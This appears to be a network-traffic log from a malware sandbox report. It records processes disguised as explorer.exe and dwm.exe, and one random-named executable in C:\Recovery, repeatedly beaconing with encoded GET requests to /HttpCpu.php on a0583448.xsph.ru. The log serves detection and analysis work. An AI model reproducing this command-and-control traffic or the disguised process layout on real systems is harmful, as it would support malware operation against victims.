Jul 25, 2024 20:04:08.270562887 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:08 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49707	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:07.648197889 CEST	518	OUT	GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:08.372046947 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:08 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49708	141.8.197.42	80	8052	C:\Windows\hh\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:07.952518940 CEST	497	OUT	GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:08.627377987 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:08 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49709	141.8.197.42	80	8040	C:\Windows\System32\WWanAPI\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:08.299228907 CEST	470	OUT	GET /HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: a0583448.xsph.ru
Jul 25, 2024 20:04:08.997185946 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:08 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49710	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:08.383152008 CEST	494	OUT	GET /HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: a0583448.xsph.ru
Jul 25, 2024 20:04:09.058770895 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:08 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49711	141.8.197.42	80	8052	C:\Windows\hh\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:08.638432026 CEST	473	OUT	GET /HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: a0583448.xsph.ru
Jul 25, 2024 20:04:09.360966921 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:09 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49715	141.8.197.42	80	336	C:\Windows\System32\WWanAPI\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:17.096529007 CEST	573	OUT	GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1 Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:18.090177059 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Jul 25, 2024 20:04:18.105515957 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49716	141.8.197.42	80	336	C:\Windows\System32\WWanAPI\dwm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:18.112358093 CEST	549	OUT	GET /HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1 Host: a0583448.xsph.ru
Jul 25, 2024 20:04:18.857573032 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:18 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49717	141.8.197.42	80	4712	C:\Recovery\jOMfQSwRhTi.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:24.361365080 CEST	627	OUT	GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko) Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:25.139061928 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:24 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49718	141.8.197.42	80	4712	C:\Recovery\jOMfQSwRhTi.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:25.162587881 CEST	603	OUT	GET /HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko) Host: a0583448.xsph.ru
Jul 25, 2024 20:04:25.944879055 CEST	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:25 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49719	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:32.912971973 CEST	535	OUT	GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: a0583448.xsph.ru Connection: Keep-Alive
Jul 25, 2024 20:04:33.740817070 CEST	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Thu, 25 Jul 2024 18:04:33 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49720	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 20:04:33.751975060 CEST	511	OUT	GET /HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr HTTP/1.1 Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: a0583448.xsph.ru
